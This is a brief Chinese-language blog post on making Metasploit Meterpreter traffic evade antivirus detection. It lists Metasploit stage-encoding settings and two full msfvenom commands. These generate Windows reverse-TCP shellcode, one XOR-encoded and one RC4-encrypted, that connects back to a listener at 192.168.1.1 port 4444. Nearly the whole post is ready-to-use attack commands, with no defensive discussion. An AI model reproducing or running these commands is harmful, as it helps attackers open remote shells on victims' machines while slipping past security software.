Meterpreter 流量免杀

2019-08-04 2019-08-04 约 100 字预计阅读 1 分钟

对 meterpreter 流量进行编码或加密, 有两种方式.

指定编码方式, 名称与对 shellcode 的编码器相同.

1
2
3


set EnableStageEncoding true
set StageEncoder x86/xor_dynamic
set StageEncodingFallback false

生成 shellcode.

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 EnableStageEncoding=true StageEncoder=x86/xor_dynamic StageEncodingFallback=false -f c -o shellcode.c

或是直接生成通过 rc4 加密流量的 shellcode.

1

msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=192.168.1.1 LPORT=4444 RC4PASSWORD=exp10it -f c -o shellcode.c